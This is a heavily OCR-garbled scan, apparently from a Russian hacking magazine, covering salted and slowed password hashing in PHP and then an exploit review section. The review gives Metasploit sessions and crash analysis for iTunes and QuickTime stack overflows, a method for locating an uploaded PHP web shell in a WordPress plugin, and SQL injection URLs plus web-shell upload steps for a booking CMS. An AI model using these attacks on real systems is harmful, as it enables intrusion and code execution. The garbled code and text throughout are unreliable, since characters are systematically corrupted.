$Ііа5Іі = БІіаІ^ипідие БаІІ: . $ра55ыогсП ; // Заносим 

в переменную Гіазіі уникальный маринованный хеш 

Надо отметить очень важный нюанс — уникальную сольтакже 
нужно будет заносить в базу попутно с хешем как двойную пару. 

Но даже получив к ней доступ, злоумышленник вряд ли сможет 
сгенерировать несколько миллионов радужных таблиц размером 
в добрые тысячи терабайт :). 

Давай немного поговорим о плюсах и минусах методов и алгорит- 
мов хеширования. С одной стороны скорость, с другой — безопас- 
ность. Казалось бы, чем быстрее, тем лучше для пользователей: 
во-первых, меньше нагрузки на сервер, во-вторых, скоростная ре- 
гистрация пользователей. Хотя чем больше скорость хеширования, 
тем быстрее его сможет вскрыть и злоумышленник. По сути дела, 
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Назіісаі поддерживает восстановление пароля из «соленых» хешей 



Жизненный цикл популярных криптографических алгоритмов 



это палка о двух концах, тут очень важно подобрать золотую середи- 
ну. Как я уже сказал — даже не знающему матчасть злоумышленни- 
ку ничего не стоит при помощи уже готовых инструментов и методик 
быстро перебрать большинство из существующих паролей. 

Конечно же, можно заставить пользователей нашего ресурса 
изобретать пятнадцатизначные пароли с использованием цифр, 
букв верхнего и нижнего регистра, специальных символов. Но по- 
нятное дело, что при таких раскладах существующие пользователи 
этого ресурса просто-напросто разбегутся, а новые будут обходить 
его стороной. 

Хочешь повысить безопасность — придется потратиться на 
ресурсы и время, причем соотношение ресурсы/время прямо про- 
порционально. 

-РипсЕіоп шуііаБІі^раББыопсІ . $ипідие заЮ { 

$5а11= = "5Ш!@#$% Л 17ВВ56Ш1_52"; 

$Иа5Іі = 5Ііа1($ипідие Баіі: . $ра55могс0; 

// В цикле исполняем функцию 1000 раз и только потом 

возвращаем результат 

-Рог ( $і _= 0 ; $і < 1000; _Іі+_+) { 

$Ііа5б = 5Ііа1($ІіаБІі) ; 

} 

геііигп $Ьа5Іі; 

} 

Если злоумышленнику для того, чтобы сломать восьмисимволь- 
ный пароль, на мощной видеокарте потребуется около 55 часов, 
то после применения метода замедленного хеширования перебор 
всех значений уже составит семь лет. РРОРІТ! ;-] 

Удобнее для замедления хеш-функций использовать различные 
криптографические алгоритмы, встроенные с РНР 4.0.32 и реали- 
зуемые через функцию сгурі(): 

<?рІір 

(СКУРТ_5ТО_ОЕ5 == 1) { 

// Прототип функции сгѵрі: следующий: сгѵрі: (біігіп^ 

5І:г ! [біігіп^ заИ:]) 

есбо ’БІіапсІагсІ РЕБ : ' . сгур1:( ' Бапдаг^заІіБига ' , ' гі ' ) 

• "\п" . ; 



(СКУРТ_ЕХТ_РЕ5 == 1) { 

есбо ' Ехііепсіесі РЕБ: ' . сгур1:( ' 5апдаг_5а1і5ига ' , ' 
39. . запі ' 3 . "\п"; 

ь_ 



(СКУРТ_МР5 == 1) { 

// Желательно его не использовать, хотя если важна 



// все-таки скорость работы, то оптимальным 
// вариантом этой функции является алгоритм МР5 

есЬо 'МР5: 1 . сгурК ' Бапдаг заІіБига 1 . 

'$1$5агдаг$' 3 . "\ п": 

} 



І-Р ( СКУРТВШІлІГІБН == 1)Л 

есііо 'ВІоыбБІі: ' . сгурК ' запіаг заІіБига ' . 

' $2а$Ѳ7$и5е5оте5І11ѵ51=піп^-Роп5а11=$ , 3 . "\п"; 

ь_ 



і-р ( СКУРТ 5НА256 == 1)Л 

есбо ' 5НА-256 : ' . сгур1:( ' 5апдаг_5а1і5ига ^ 

, $5$^оипсІ5=5ѲѲ0$и5е5оте5І11ѵ51=піп^-Ро^5а11=$ , 3 . "\п"; 

3^ 



і-Р (СКУРТ 5НА512 == 1^ { 

есбо '5НА-512: ' . сгур1:( ' 5апдаг_5а1і5ига ' д 

'$6$гоипсІ5=5000$и5е5оте5І11у5І:гіп§-Рог5а11:$ ' ) . "\п"; 

Ь- 

?> 

Если второй аргумент функции сгурі не будет передан, он будет 
выбран случайным образом, так что соль генерируется полностью 
случайно. Золотой серединой метода замедления хеш-функции 
является применение криптоалгоритма ВіоѵѵПбЬ. ВіоѵѵПбЬ — это 
способ шифрования с медленным алгоритмом разделения ключа 
(сам алгоритм довольно быстр после выполнения разделения 
ключа [кеу зсЬесІиІіпд], а также когда необходимо зашифровать 
большое сообщение с одним ключом). По современным меркам ИБ 
такой код должен обеспечить максимальную безопасность. 

-Рипсіііоп Ь1оыРІ5Іі_Ііа5Іі($ра55ыопсІ . $ипідие_5аЮ { 

// Соль для ВіомРібіі должна быть длиной в 22 символа 

геііигп сгѵрі: ($ра55ыогсІ. '$2а$10$' . $ипідие_5а11: V. 

ь_ 



ЗАКЛЮЧЕНИЕ 

Сильная криптография, если все сделать верно, дает многое, но 
она не панацея. Сосредоточение на криптографических алго- 
ритмах, сопряженное с игнорированием остальных аспектов 
безопасности, похоже на попытку защитить дом — не построив 
забор вокруг него, а установив огромный столб в надежде, что 
противник налетит прямо на него. Сообразительный нападаю- 
щий просто обойдет алгоритмы. Иногда, изобретая новый способ 
взлома системы, мы используем те же старые ошибки, которые 
разработчики повторяют снова и снова. Все новое — хорошо за- 
бытое старое. □С 
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АВТОР МБ5СВѴРТ ПОДЧЕРКНУЛ НЕБЕЗОПАСНОСТЬ ДАННОГО АЛГОРИТМА 
И ПРИЗВАЛ ПЕРЕЙТИ НА БОЛЕЕ СТОЙКИЕ МЕТОДЫ ХЕШИРОВАНИЯ ПАРОЛЕЙ 



Под впечатлением отутечки нескольких 
миллионов хешей паролей пользователей 
сайтов І_іпкесІІп, еНагтопу и І-азЫт, Пол- 
Хеннинг Камп (РоиІ-Неппіпд Катр), объявил, 
что созданную им в 1995 году реализацию 
системы хеширования паролей тсібсгурі 
больше нельзя считать безопасной. 

По словам Пола-Хеннинга Кампа, 
тсібсгур* исчерпал себя как алгоритм 
хеширования паролей. Современные 
инструменты подбора паролей, способные 
проверить миллион комбинаций в секунду, 
благодаря задействованию средств 



6РІІ-акселерации могут восстановить 
любой семисимвольный пароль по хешу 
тсі5 меньше чем за шесть минут, а для 
шестисимвольного перебор всехзначений 
и вовсе будет составлять примерно 
минуту. Так как во многих системах для 
хеширования паролей по умолчанию по- 
прежнему используется тсібсгурі, Пол- 
Хеннинг Камп призвал пользователей 
и разработчиков ОС перейти на более 
стойкие алгоритмы. 

Пол-Хеннинг не указывает на конкретный 
алгоритм, но советует использовать 



некоторые методы повышения затрат 
вычислительных ресурсов, например 
цикличное вложенное хеширование или 
комбинацию результатов разных алгоритмов 
хеширования. Для сайтов с более чем 50 
тысячами пользовательских аккаунтов Пол- 
Хеннинг Камп порекомендовал использовать 
собственный модифицированный алгоритм, 
базирующийся на стойких хешах, таких как 
5НА (чтобы организовать процесс подбора 
паролей для нестандартного алгоритма, 
дополнительно потребуется определить 
и воссоздать его логику). 



ПОЧЕМУ СУЩЕСТВУЕТ УЯЗВИМОСТЬ? 



Прежде чем ответить на этот вопрос, нужно понять, почему 
уязвимости бывают в криптографических алгоритмах 
хеширования. Ведь основной целью применения 
криптографии изначально являлось скрыть информацию 
и, как следствие, сделать практически невозможной 
расшифровку захешированного сообщения, поскольку 
циклические алгоритмы хеширования были изначально 
подвержены коллизиям. Чтобы это понять, не нужно быть 
крутым математиком. 

Еще недавно (примерно шесть лет назад) коллизии 
для криптографических алгоритмов хеширования могли 
показаться фантастикой, а сегодня этим уже никого не 
удивишь. Некогда «устойчивые» алгоритмы хеширования 
М04/М05, ставшие стандартами де-факто во многих 
проектах и решениях в области продуктов информационной 
безопасности, теперь полностью безнадежны и должны быть 
отправлены только в одном направлении... да, ты угадал: 
в самое /сіеѵ/пиІІ :). 

Примерно то же самое происходило в 1995 году 
с алгоритмом 0Е5. Последствия, которые он оставил, 
до сих пор дают о себе знать. Но почему, осознавая, 
что алгоритм более не безопасен, мы продолжаем его 
использовать? Возможно, потому, что просто привыкли 
к этим алгоритмам хеширования, ведь они прочно вошли 
в нашу жизнь. Хотя есть еще один важный момент: лень- 
матушка, и от нее никуда не денешься, ага :). Более подробно 
о коллизиях криптографических функций и типах атак 
ты можешь прочитать в моей статье «Опасный двойник», 
опубликованной в номере 159 нашего журнала. 

Если хорошо разбираться в математике и прикладной 
криптографии, есть возможность найти ошибку в алгоритме 
хеширования, так как чем сложнее алгоритм, тем больше 
вероятности ее нахождения. Надо понять такую вещь: 
в криптографии, как и в программировании, чем больше 
проект, тем больше ошибок. Людям свойственно ошибаться, 
поэтому при поиске ошибок всегда есть надежда на 
незаменимый в этой области человеческий фактор :). При 
портировании криптографических алгоритмов и написании 



обертки также не исключено появление ошибок. В качестве 
примера можно привести набор замечательных ошибок, 
недавно обнаруженных в реализации класса КБАСгурІоБ- 
егѵісеРгоѵісіег библиотеки .ИЕТ Ргатеѵѵогк. Как оказалось, 
заявленные в классах ВБАСгурІоБегѵісеРгоѵісІег и йБАСгур- 
ІоБегѵісеРгоѵісІег методы БідпНазИ имеют глупейшую 
ошибку, которая заключается в псевдорандомизации трех 
из четырех блоков. Итог: +75% к атакам на Р5А шифрование 
в ѴМ .МЕТ. 

Многие журнальные и научные статьи любят описывать 
криптографические продукты в терминах алгоритмов 
и длины ключей. Алгоритмы благозвучны: их описание 
может быть немногословным и их легко сравнивать друг 
с другом. «128-битные ключи означают высокую степень 
защиты». «Тройной 0Е5 означает высокую степень защиты». 
«40-битные ключи означают низкий уровень защиты». 
«2048-битный РБАлучше 1024-битного Р5А». 

Но в реале все не так просто. Более длинные ключи 
не всегда означают лучшую защиту. Давай сравним 
криптографический алгоритм с замком на твоей 
входной двери. Большинство дверных замков имеют 
четыре металлических штифта, каждый из которых 
может находиться в одном из десяти положений. Ключ 
устанавливает штифты в особой комбинации. Если ключ 
установит их все правильно, замок откроется. Таким 
образом, может быть только 10 тысяч различных ключей, 
и взломщик, готовый испробовать их все, обязательно 
попадет к тебе в дом. Но улучшенный замок с десятью 
штифтами, дающий 10 миллиардов возможных ключей, 
часть из которых, несомненно, будет забракована или 
будет содержать дефект, естественно, не сделает твое 
жилище безопаснее. Правильные хеш-крекеры не 
испытывают каждый возможный ключ (атака «в лоб»), 
большинство даже не настолько хитры, чтобы взломать 
замок (криптографическая атака на алгоритм), и используют 
готовые инструменты и рекомендации. Лучшие замки не 
спасут от таких атак, пока будут существовать ошибки 
в алгоритмах проектирования. 



• Про догмы 

в криптографии: 

ЬіЫѵ/ОбІСІАІМ: 

• база хешей Ыпке- 
сПп: ЬіЫу/КНРІЫ: 

• немного о хешах 
и безопасном 
хранении паролей: 

ЫЫу/ОуУУпсУ: 

• Ііте-тетогуігасіе 
оН и нерадужные 
таблицы: 

..Іѵ/ 0 ѵѴѴ 25 ..І: 

• матчасть по 
радужным 
таблицам: 

ЬИ.Іу/п2ЫМг: 

• осІНазІісаі — 
наилучший 6РЦ- 
брутфорсер: ИазЬсаІ. 
пеІ/осійазНсаІ:: 

• готовые радужные 
таблицы: 
ЬіІ.Іѵ/МѵРХиЕ: 

• Опііпе НазЬ Сепега- 
Іог (345 алгоритмов): 
ЬИ.Іѵ/сНѵегі . 

гш 

Всевозможные 
реализации 
маринованного 
хеширования ты 
можешь найти 
в библиотеке, 
представленной 
на нашем диске (зге/ 
рИр_заШіазІі_Щпс- 
Ііоп.іпс.рЬр). 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроБсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д. 1] 




Обзо 



И снова мы фаззер запустим, 
И снова он выдастнам сбой. 
Сюжетликованья опустим, 
Эксплоитомейкеры, в бой! 



эксплоитов 




ѴѴАІМШС 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



л Арріе іТипез 10: переполнение буфера на стеке 
1Н при обработке расширенного тЗи-файла 



СѴ55Ѵ2 9.3 



(АѴ:Ы/АС:М/АІІ:М/С:С/І:С/А:С)| 

М:1Ы ^ 

Дата релиза:25июня 2012 года 
Автор: РНО,зіппЗг 
СѴЕ: СѴЕ-20 1 2-0677 

В данном случае речь пойдет об ошибке переполнения буфера на стеке 
в версияхіТипез, начиная с 10.4.0.80 изаканчивая 10.6.1.7. Когда откры- 
вается расширенный тЗи-файл, содержащийтег«#ЕХТІІ\ІР:», ІТипез 
копирует данные, располагающиеся после да иного тега, без каких-либо 
проверок. Копирование происходит из буфера в куче в буфер на стеке, 
при этом осуществляется запись да иных за границы буфера на стеке, 
что приводитквозможности выполнения произвольного кода в контек- 
сте пользователя, запустившего процесс іТипез'а. 



ЕХРЮІТ 



Начнем наши изыскания сзапуска модуля для Меіазріоіі, соответствую- 
щего рассматриваемой уязвимости: 

тз-Р > изе ехріоііі/ыіпсіоыз/ьгоызег/арріе іііипез ехііепсіесі шЗи 
тз-Р ехр1огБ(арр1е_гБипез_ех1:епс1ес1_тЗи) > зеі: игіра1:И ехт 
оЙіі|ЙйШ г. 

тз-Р ехр1оіі(арр1е_і1:ипе5_ех1:епсІесІ_тЗи) > зеі: і:аг§еі: 0 
Іаг§еі => 0 

тз-Р ехр1оіі(арр1е_ііипез_ех1:епсіесІ_тЗи) > 

зеі: рауіоасі ыіпсіоыз/ехес 
рауіоасі => ыіпсіоыз/ехес 

тз-Р ехр1огБ(арр1е_гБипез_ех1:епс1ес1_тЗи) > зеі: стсі саіс.ехе 



стсі => саіс.ехе 

тз-Р ехр1оіі(арр1е_і1:ипе5_ех1:епсІесІ_тЗи) > зііоы ор-Біопз 
Мосіиіе ор~Еіопз 

(ехр1оі1:/ыіпсІоы5/Ьпоы5ег/арр1е_і1:ипе5_ех1:епсІесІ_тЗи) : 

Мате Сиггепі: Беѣ КеяиігесІ Резсгірііоп 



5КѴН05Т 0.0. 0.0 уез ТИе Іосаі Ііозі: іо Іізіеп оп. 

ТІііз тизі: Ье ап асісігезз оп 
іИ е Іос аі тасіііп е ог 0.0. 0.0 

5КѴРОКТ 8080 уез ТЬе іосаі рогі іо 

іізіеп оп. 

55 Б -Раізе по Nедоііаіе 55І ?ог іпсотіпд 

соппесііопз 

55ЕСегЕ по РаіЬ іо а сизіот 55 Ь 

сегіірсаіе (сіе^аиіі із 
гапсіотіу депегаіесі) 

55БѴег 55 БЗ по Зресі^у іііе ѵегзіоп о/ 

55ііііаі зЬоиШ Ье изесі 
(ассеріесі: 55І2 \ 5513, ТІ51) 

БІКІРАТН ехт по ТЬе ІІРІ іо изе / ог іЬіз 

ехріоіі (сіе^аиіі із гапЫот ) 



Рауіоасі орііопз (ыіпсіоыз/ехес) : 

Ыате Сиггепі: Беѣ КеяиігесІ Резсгірііоп 



СМР 


саіс.ехе 


уез 


ТІіе соттапсі з1:гіп^ 








іо ехесиіе 


ЕХІТРБІМС 


ргосезз 


уез 


Ехіі іесііпідие: зеіі. 








ііігеасі., ргосезз, попе 



Ехріоіі: іаг§еі: 

ІсІ ІМате 

0 ІТипез 10.4.0.80 іо 10.6.1.7 мгЫі ОиіскТіте 7.69 
оп ХР 5РЗ 
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Обзор эксплойтов 



ГП5-Р ехріоіі (арр1е^ііипе5_ехі:епсІесІ_тЗи) > ехріоіі 
[*] Ехріоіі гиппіп^ аз Ьаск^гоипсІ іоЬ. 

[*] 1)зіп§ ЦКІ.: Ьіір: //0.0.0.0:8080/ехт 
[*] І_оса1 ІР: Іпіір : //192 . 168 .0.64: 8080/ехт 
[*] Зегѵег зіагіесі. 

тз-Р ехріоіі (арр1е^ііипе5_ехіепсіесІ_тЗи) > 

Итак, сервер за пущен. Идем на машину, на которой у нас установлен 
ІТипез. Запускаем там Іпіегпеі Ехріогег, ІТипез; аттачимся к ІТипез от- 
ладчиком, вбиваем в адресной строке ІЕ фразу Ыір://1 92.1 68.0.64:8080/ 
ехт и пару секундждем результата. 

Результатявляется кнам в обликеАССЕ55ѴІ0І_АТІ0М при попыткеза- 
писи по адресу 0x130000 после исполнения следующей инструкции: 

10СЕ9А7А ЕР МОѴЗ РЫСЖР РТК Е5: [ЕРІ] .РЫСЖР РТК Р5:[Е5І] 



2 



В Арріе ОиіскТіте переполнение буфера 
на стеке при обработке ТеХМ Ь-файла 



СѴ55Ѵ2 



9.3 






( АѴ: Ы/АС: М/АУ: Ы/С:С/І :С/А:С) 



Дата релиза: 28 июня 2012 года 

Автор: АІехапсІег6аѵгип,5ІппЗг,іиап ѵаіриеі 



СѴЕ: СѴЕ-2012-0663 



При обработкеспециальным образом сформированногоТеХМЕ-файла 
происход ит переполнение буфера на стеке, что при водит к возможности 
выполнения произвольного кода в контексте пользователя, запустив- 
шего процесс ОиіскТіте. 



Перейдем на начало функции, ккоторой относится данная инструк- 



ция, и попытаемся понять, что за зверь предстал нашему взору. ЮА, 
к сожалению, опознать его не смогла, ну и ладно — побудем сегодня 
сигнатурными нищебродами. Путем бесхитростныхумозаключений 



приходим к выводу, что перед нами красуется БІгпсруІсбаг^сІеБІіпаІіоп, 
сопБІ сНаг*5оигсе, зІ 2 е _1 пит). Вызывается она отсюда: 


10356949 


РІІ5Н ЕЗІ 


1035694А 


АОй ЕАХ,8 


10356940 


РЫЗН ЕВР 


1035694Е 


РІ15Н ЕАХ 


1035694Р 


САН зігпсрѵ : <--- СЗОМ! 


10356954 


МОѴ ЕАХ. РЫСЖР РТК 3$: [Е5Р+4С] 


10356958 


МОѴ ЕСХ,ОЫСЖО РТК 55:[Е5Р+24] 


1035695С 


АРР Е5Р , 0С 



На стекпри этом кладутся следующиеаргументы: 

ѲѲ12ЕЕ6С ѲѲ12Р62Ѳ ; адрес на стеке, куда мы будем писать 
ѲѲ12ЕЕ7Ѳ Ѳ5А1С429 ; адрес в куче, откуда мы будем читать 
Ѳ012ЕЕ74 00000РР7_^ р азмер копируемых данных 



ЕХРЮІТ 



В данном модуле эксплуатируется ошибка в компоненте 
ОиіскТітеЗбРРщІх в процессе обработки атрибута 'соіог'. Ошибка 
проявляется из-за некорректной проверки размера данныхперед их 
копированием в буфер фиксированного размера, располагающийся 
на стеке. Ниже представлен цикл, в котором и происходит затирание 
всегоживого на стеке: 



.іехі:67Е6РѲЕ0 
«іехі : 67Е6Р0Е0 


1ос_ 

асісі 


67Е6О0Е0 : 
есх, 1 


: СОРЕ ХКЕР : 


ѵи1гѵРоо+1Р | і 


.іехі : 67Е6Р0ЕЗ 


тоѵ 


[езі], аі 


: <- падаем с 


АССЕ55 ѴІОІ.АТт\І 








; в процессе 


записи по 


; адресу 0x140000 


.іехі : 67Е6Р0Е5 


тоѵ 


аі, Гесхі 






.іехі : 67Е6Р0Е7 


асісі 


езі, 1 






.іехі:67Е6РѲЕА 


асісі 


СІ1, 1 






.іехі:67Е6Р0ЕР 


стр 


аі, Ь1 






.іехі : 67Е6Р0ЕР 


ІД2. 


зііогі Іос 


67Е6РѲЕѲ 





Каки в предыдущем случае, мы имеем дело с ЗЕН -эксплойтом, 
п оэтому а дресЗЕН -обработчика перезаписан нашим значением: 



Ответственным за бесформенное безобразие, связанное с пере- 
полнением буфера, будеттретий аргумент, представляющий собой 
размер копируемых да иных и в нашем случае равный 0x117. 

В дельта -окрести ости этого вызова, к сожалению, не было кода 
для проверки упомянутого третьего аргумента, и вкупе с тем фактом, 
что функция зігпсру является небезопасной, исполнение функции с 
подобными аргументами приводит к столь печальным последствиям... 

Очевидно, что стек после буфера, куда происходила запись, превра- 
тился в месиво. Но что не может не радовать — месиво, нам подвластное. 

В процессе перезаписи мы вышли за границы буфера на стеке и 
перезаписали своими данными адрес возврата, также располагаю- 
щийся на стеке. В принципе, на этом можно было бы остановиться и по- 
лучить классический тип эксплойта. Но в данном случае авторы пошли 
дальше и переза писал и также ЗЕН -цеп очку, прев рати в тем самым 
обычный классический эксплойт в ЗЕН -эксплойт. Ну а для того, чтобы 
передать у правление на перезаписанный адрес ЗЕН -обработчика, 
они продолжили гадить в стек, пока не уперлись в упоминаемый выше 
АССЕ55ѴІ0І_АТІ0М при попыткезаписи по адресу 0x130000. Управле- 
ние в связи с этим передалось на контролируемый ЗЕН -обработчик, 
далеена РОР-цепочку, задачей которой является вызов функции 
ѴігІиаІРгоІесІ для установки прав доступа на исполнение страницам 
памяти, содержащим шелл- код (дабы обойти О ЕР). И последний шаг — 
собственно передача управления на шелл -код. Занавес. 



5ЕН сбаіп о-Р таіп ібгеасі 
АсІсІгеББ 5Е бапсііег 
ѲѲ13СЕ78 0иіскТ_2 . 6680104 2 
601Е06ЕВ *** ССЖКУРТ ЕІЧТКѴ *** 



То есть после того, как в результате исполнения инструкции 
«тоѵ [езі], аі» будет сгенерировано исключение АССЕ55_ѴІ0І_АТІ0І\І, 
управление перейдет на следующий код: 



66801042 


5Р 


РОР ЕОІ 


66801043 


5Е 


РОР ЕЗІ 


66801044 


СЗ 


КЕТМ 



Классика жанра. Да л ее управление передается на шелл-код и за- 
пускается калькулятор. В данном Меіазріоіі-модуле отсутствуетобход 
РЕР'а, но никто тебе не запрещает его здесь добавить. 

Генерация эксплойта для ОиіскТіте 7.6.9 с полезной нагрузкой в 
видезапуска калькулятора: 

тзі > ЦБе ехріоіі/міпсіоіл/з/іііе-рогтаі/арріедиіскіітеіехті 
ГП5-Р ехр1оіі(арр1е_диіскііте_іехт1) > ігѵРо 



ТАК6ЕТ5 



ІТипез 10.4.0.80— 10.6.1.7. 



АѵаіІаЬІе іаг§еіз: 

16 Мате 



50ШТІ0Ы 



Существует обновление, устраняющее данную уязвимость. 



0 ОиіскТіте 7.7.1 оп Ыіпсіоіл/з ХР 5РЗ 

1 ОиіскТіте 7.7.0 оп Ыіпсіоіл/з ХР 5РЗ 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



ГП5-Р ехр1оі1:(арр1е_яиіск1;іте_1:ехт1) > зеі: 1:аг§е1: 2 
■Ьаг^е-Ь => 2 

ГП5-Р ехр1оіѣ(арр1е_яиіск-Ьіте_ѣехт1) > зеі: рауіоасі міпсіомз/ехес 
рауіоасі => іл/іпсіоіл/з/ехес 

ГП5-Р ехр1оі1:(арр1е_яиіск1:іте_1:ехт1) > зеі: стсі саіс.ехе 
стсі => саіс.ехе 

тз-Р ехр1оі*(арр1е_яиіск-Ьіте_Ьехт1) > ехріоіі: 

[*] Сгеаіііп^ 'тзТ.хт!'. 

[+] тз-Р.хт! зііопесі аі: /Ііоте/ріко-РагасІ/.т5-Р4/1оса1/т5-Р.хт1 
тз-Р ехр1огЬ(арр1е_диіск-Ьіте_-Ьехт1) > 



ТАК6ЕТ5 



ОиіскТіте 7.6.9, ОиіскТіте 7.7.0, ОиіскТіте 7.7.1. 



50ШТІ0Ы 



Существует обновление, устраняющее да иную уязвимость. 




ОиіскТіте— цикл, который приведетк переполнению буфера на стеке 



• Загрузка произвольного файла в ѴѴогсІРгезз 
КевитеЗиЬтіввіопз&^ЬРовІіпдв 



СѴ55Ѵ2 5.0 



I -1 :і Ы ^ 



(А\Ж/АС:1_/Аи:М/С:М/1:Р/А:М] 



Девятого июля были опубликованы дета л и уязви мости в плагине 
ѴѴогсІРгезз Резите Би Ьтіззіопз&ЭоЬ РозЛпдз, позволяющей загружать 
произвольные файлы на сервер (само собой, для их последующего ис- 
полнения). 



ЕХРЮІТ 



В плагине существует возможность за грузки резюме через поле«Л1е 
аиасіітепі», в котором никакнефильтруется расширение файла. 
Вложения загружаются в папку/ѵѵр-сопІепі/ирІоасІз/гзІр/аиасНтепІз/. 
Однако имя файла при загрузке изменяется, за это отвечают строки 
193-197 в скрипте/ѵѵр-сопІеп^/рІидіпз/гезите-зиЬтіззіопз-іоЬ- 
розЛпдз/іпсІисІезЛипсЛопз.рЬр: 

ТогеасІі ( $_Р I БЕ5[$іпри1:] [ ' еггог ' ] _аз $кеу => $еггог ) 

І-Р ( $еггог == ЦРЮАРЕККОК ) 

{ 

$1:трІ\Іате = $_РІІ_Е5[$іпри1:] [ 1 1:тр_пате ' ] [$кеу]з 
$ех1: = §е1:Ех1:еп5Іоп( $_РІІ_Е5[$іпри1:] [ 'пате' ] [$кеу ] ) ; 
$пате = тсІ5( сІа1:е( ’У-пьсІ Ніііз' ) ) . . 

$соип1: . ' . ' . $ех1:; 

Из этого фрагмента кода следует, что в качестве нового имени файла ис- 




іТипег 10 — обходйЕРвРОР-цепочке 



пользуется М 05 отзначения текущей даты на сервере, в довесок к этому 
прибавляется дефис и порядковый номер файла (если загружался один 
файл, тотам всегда будет стоятьединица). 

Рассмотрим конкретный пример. Если время на сервере было равно 
2012-07-09 21:22:20 и в эту секунду был загружен ровно один файл, то его 
имя будет813а2040е8еТ7Те3661972696409Ь562-1.рІір и его можно будет 
обнаружить в папке /ыр-сопіепі/иріоасіз/пзэр/аііасіітепіз/. Для по- 
лучения даты сервера можно воспользоваться ВигрЗиКе и посмотреть 
датусервера, котораяуказана в200-м ответесервера после отправки 
файла. Для формирования правильного имени файла также необходимо 
прибавить одну секунду к времени сервера, полученного в ответе. Таким 
образом, если время сервера было 2012-07-09 21:22:1 9, то имя загружен- 
ного файла будеттсІБС'гѲіг-ѲТ-Ѳд 21:22:20") + ' -1. рМр'. 



ТАК6ЕТ5 



ѴѴогсІРгезз Резите Би Ьтіззіопз&ЭоЬ РозІіпдзѵ2.5.1 и, возможно, более 
ранние. 



БОШТІОЫ 



Обновить ѴѴогсІРгезз Резите Би Ьтіззіопз & ЭоЬ Розііпдздо версии 2.5.2 
или более поздней. 



4 ^ Множественные уязвимости в Кезегѵе Ьодіс 
ѵ1.2ВоокіпдСМ5 



СѴ53Ѵ2 8.5 



(АѴ:М/АС:М/Аи:5/С:С/І:С/А:С) 



В середине июня были раскрыты уязвимости в движке Резегѵе І_одіс ѵі.2 
Воокіпд, в числе которых стандартные и слепые БОБ-инъекци и, загрузка 
произвольныхфайлов,атакжеразношерстныеХ55.3а столь дерзкую 
раздачувзяла на себя ответственность контора ѴиІпегаЬіІі1:у-І_аЬ. 



ЕХРЮІТ 



1. 5СІІ_-инъекции.Этиуязвимости позволяютатакующемувыпол- 
нитьпроизвольныеБОБ-команды на соответствующей СУБД. 
Уязвимыескрипты: 

• раскадесІеІаіІз.рЬр; 

• Ьоокіпд_герогСрНр; 

• изегз_герог1.рИр; 

• есМіепдиігіез.рИр; 

• асІсІсІіепІІосаІіопз.рНр; 

• асІсІсиз^отегз.рИр; 

• асІсІраскадез.рИр; 

• асІсІассот1:уреаѵаіІаЬіІі*у.рНр; 

• Ьоокіпд_герогСрНр; 

• асІсІзресіаІо^ег.рИр. 
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Обзор эксплойтов 



Уязвимые параметры: 

• ісі; 

• гдНМепи; 

• ріб; 

• огбегЬу. 

Уязвимости могутэксплуатироваться без наличия аккаунта при- 
вилегированного пользователя. Вот несколько примеров: 

• Іт1=1=р: //127. 0.0. 1:1337/ [путь- к- геБегѵеІо^іс]/ 
раска§егіе1:аіІ5.рІір?рігі=4+[5рі-ІІ\і:іЕСТІ0І\І]АШ+ 
зиЬз1:гіп§(ѵег5Іоп() ,1)=5 



• 61:1: р : / / 127 .0.0.1: 1337/ [путь - к - гезегѵеіо^іс ] / асішіп/ 
Ьоокіп^герогіі. р!ір?г^Іт1:Мепи=г^Іт1:МепиЗ&[$01-ІМЗЕСТІ0М] 
Цпіоп+зеІесІг+І^.ЗЛ.Б. . . 30--%20-0&5Ог1:=х&1=х1=РготРа1=е= 
х&1:х1:ТоРа1:е=х 



• М1:1:р : //127.0.0. 1:133 7/ [путь- к- гезегѵе1о§іс] /асітіп/ 
Ьоокіп§_герог1:. рбр?г§1г1:Мепи=г§1т1:МепиЗ& 
огсіегЬу=-1%27^1-ІЮЕСТІОІ\І]& 

зог1:=А5С&1:х1:РготРа1:е=05-17-2012&1:х1:ТоОа1:е=06-16-2012 



• Міі-Іір : //127 . 0 . 0 . 1 : 1337/ [ путь- к-гезегѵе1о§іс]/асІтіп/ 
асІсІассот1:уреаѵаі1аЬі1і1:у . ріпр ? ісІ=72 [ ВИМР 5(2І_-ІІ\і:іЕСТІОІ\І] 



• ІтЕІір: //127. 0.0. 1:1337/ [ путь- к- гезегѵеіо^іс] /асішіп/ 
Ьоокіп^герогі:. р!ір?п^Іт1:Мепи=п^Іт1:МепиЗ& 

[ВИШ 501-ІЮЕСТІ0І\І]&зог1:=А5С& 
1:х1:РготРа1:е=х&1:х1:ТоРа1:е=х 



2. Загрузка произвольныхфайлов. Уязвимость позволяетпри- 
вилегирова иному пользователю загружать вредоносные файлы 
без каких-либо ограничен ий. Фильтрация загружаемых файлов 
отсутствуетсовершенно, поэтому атакующий можетбез про- 
бл ем за грузить веб-шелл. Уязвимость расположена в скрипте 
асІсІІосабопрЬоІоз.рЬр.Загружаемыефайлы сохраняются в папку 
../даііегуіппадез/. 



Для эксплуатации необходимо зайти на одну из следующих страниц: 

• ІтЕІгр: //127.0.0 Л: 1337/ [путь- к- гезегѵеіо^іс] /асішіп/ 
асісіраска^ез. рИр 



• Іі1:1:р : //127. 0.0. 1:1337/ [путь- к-гезегѵе1о§іс] /асішіп/ 
асІсПіемз.рІір 



• ІгЕІір : //127. 0.0. 1:1337/ [путь- к- гезегѵеіо^іс] /асішіп/ 
асІсІ_Ьаппег. рбр 



• Ітіір : //127. 0.0. 1: 1337/ [путь- к- гезегѵе1о§іс] /асішіп/ 
асІсІассот1:уреаѵаі1аЬі1і1:у . рбр 



• ІгЕІір : //127. 0.0. 1:1337/ [путь- к- гезегѵеіо^іс] /асішіп/ 
асІсІсиз'Еотегз . рИр 

и скопировать код своего на и полезнейшего скрипта в поля ввода 
ТШе или Мате. 

4. ПассивныеХББ.Этиуязвимости позволяютатакующему пере- 
хватывать сессии других пользователей/модераторов/админи- 
страторов. 

Уязвимыескрипты: 

• ІосаІіопсІеІаіІз.рЬр; 

• Ьоокіпдз.рЬр; 

• асИраскадез.рбр; 

